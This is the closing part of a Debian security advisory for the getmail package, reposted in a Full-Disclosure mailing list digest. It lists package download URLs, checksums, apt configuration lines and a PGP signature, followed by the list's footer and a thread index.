        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.d
sc

      Size/MD5 checksum:      583 6263f8d2d75ec3eb21dd302e0b9d6729

http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.d
iff.gz

      Size/MD5 checksum:     2645 ff40d8f72744bfec8a963ece950e0bcd

http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7.ori
g.tar.gz

      Size/MD5 checksum:    70944 4eef6be77a4cbe1a86eef75affd31b05

  Architecture independent components:

http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2_a
ll.deb

      Size/MD5 checksum:    74388 f2b9e79b1ddd8ef8bf719d4e1894f051

  These files will probably be moved into the stable distribution on
  its next update.

-

------------------------------------------------------------------------
---------

For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security

dists/stable/updates/main

Mailing list: debian-security-announce () lists debian org
Package info: `apt-cache show <pkg>' and

http://packages.debian.org/<pkg>


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBV+ydW5ql+IAeqTIRAjKVAJ4jTCBi6jY/HaghCNdQUVfyy2giOQCbB688
7yr1RQ2U25tXqQDxJZqHyPE=
=3lYo
-----END PGP SIGNATURE-----

--__--__--

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure

End of Full-Disclosure Digest


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

[Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs milw0rm Inc. (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs DanB UK (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs Barry Fitzgerald (Sep 28)
  - RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Geo. (Sep 28)
    - Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Barry Fitzgerald (Sep 28)
- <Possible follow-ups>
- RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs Todd Towles (Sep 29)
  - Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs DanB UK (Sep 29)
  - Message not available
    - Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs GuidoZ (Sep 29)